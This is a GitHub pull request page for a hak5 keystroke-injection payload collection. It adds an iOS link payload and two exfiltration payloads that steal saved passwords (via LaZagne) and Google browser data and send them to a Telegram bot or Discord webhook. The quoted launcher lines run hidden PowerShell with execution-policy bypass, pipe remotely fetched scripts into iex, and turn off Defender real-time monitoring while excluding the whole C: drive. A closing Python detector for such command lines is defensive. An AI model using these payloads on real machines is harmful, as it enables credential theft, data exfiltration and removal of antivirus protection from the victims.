1 New Mobile IOS payload | 2 New Exfiltration payloads #410

Merged
merged 29 commits into from
Jul 11, 2024

@Mr-Proxy-source Mr-Proxy-source commented Dec 16, 2023

  • Added payload for opening links for iOS 17 and older
  • Added LaZagne exfil payload for exfiltrating all passwords through a Telegram bot
  • Added Google exfil payload that uses 7-Zip to zip user data, upload it to a file-sharing service and send the download link through a Telegram bot or Discord webhook.
  • Fixed some mistakes in Copy and Waste

@Mr-Proxy-source Mr-Proxy-source changed the title from "New IOS Payload - Open Link" to "New Mobile Payload - Open Link | New Exfiltration Payload - Lazagne Exfil" Dec 18, 2023
Line 10 added r after GUI, line 11 added delay.
This payload runs a PowerShell script that zips Google user data, uses the gofile.io API to upload it, and then sends the download link to a Telegram bot or Discord webhook.
@Mr-Proxy-source Mr-Proxy-source changed the title from "New Mobile Payload - Open Link | New Exfiltration Payload - Lazagne Exfil" to "1 New Mobile IOS payload | 2 New Exfiltration payloads" Dec 19, 2023
DELAY 500
REM If you want to use Telegram change just bot token and chat id
REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex
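
Review bot: the STRING line pipes the result of `irm https://t.ly/pPFpN` straight into `iex`, so what runs is whatever the short link resolves to at execution time and cannot be reviewed from this repository. Replace the short link with a placeholder such as example.com and keep the script itself in the payload directory so readers can inspect it before pointing the payload at a copy they host.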

DELAY 1500
GUI r
DELAY 500
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'"
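
Review bot: the STRING line runs `Set-MpPreference -DisableRealtimeMonitoring $true` and `Add-MpPreference -ExclusionPath 'C:\'`, and nothing in the visible lines restores either setting, so the machine is left with real-time monitoring off and the whole C: drive excluded after the payload finishes. State this side effect in the payload's REM header or README together with the steps to revert both settings, and replace the t.ly short link with a placeholder so the executed script can be reviewed.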

DELAY 1000
GUI SPACE
DELAY 250
REM Put your link down there ↓

@dallaswinger dallaswinger added the "pending requested changes" label (requires changes before merge) Jan 2, 2024
@Mr-Proxy-source

All requested changes have been made, if there is anything else let me know.
Happy new year btw :D

Changed to example.com
Changed to example.com
@Mr-Proxy-source

Here I fixed it, lmk if there is anything else.

@hak5peaks hak5peaks merged commit b469aff into hak5:master Jul 11, 2024
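
A defender's view of the launcher lines quoted in this pull request, as an added example (not code from the PR or the hak5 repository): a Python check that flags process command lines combining a hidden window or execution-policy bypass with an `irm ... | iex` download cradle, or that change Defender preferences. The rule names, helper functions and sample command lines are constructed for illustration.

```python
import re

# Download cradle: a web request cmdlet/alias whose output is piped into Invoke-Expression.
CRADLE = re.compile(r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(iex|invoke-expression)\b")
# Defender tampering: real-time monitoring switched off, or an exclusion path added.
DEFENDER = re.compile(r"(?i)\b(Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true|Add-MpPreference\s+-ExclusionPath\b)")

def _abbrev(token, full, min_len=1):
    """True if token is a leading abbreviation of full (PowerShell accepts shortened names)."""
    token = token.lower()
    return len(token) >= min_len and full.startswith(token)

def findings(cmdline):
    """Return the set of indicator names present in one process command line."""
    hits = set()
    tokens = cmdline.split()
    for name, value in zip(tokens, tokens[1:]):
        if not name.startswith("-"):
            continue
        name, value = name[1:], value.strip("'\";")
        if _abbrev(name, "windowstyle") and _abbrev(value, "hidden"):
            hits.add("hidden_window")
        if (name.lower() == "ep" or _abbrev(name, "executionpolicy", 2)) and value.lower() == "bypass":
            hits.add("policy_bypass")
    if CRADLE.search(cmdline):
        hits.add("download_to_iex")
    if DEFENDER.search(cmdline):
        hits.add("defender_tamper")
    return hits

def suspicious(cmdline):
    """Alert on Defender tampering, or on a cradle launched hidden or with policy bypass."""
    hits = findings(cmdline)
    return "defender_tamper" in hits or (
        "download_to_iex" in hits and bool(hits & {"hidden_window", "policy_bypass"}))

# Constructed sample command lines (not real telemetry); example.com is a placeholder.
SAMPLES = [
    "powershell -w h -NoP -Ep Bypass -Command $u='x'; irm https://example.com/a.ps1 | iex",
    "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    "powershell -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1",
    "powershell -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(suspicious(line), sorted(findings(line)), line)
```

Feed it the command-line field from process-creation logs; the two benign samples show that an explicit execution policy or `-NoProfile` alone does not trigger an alert.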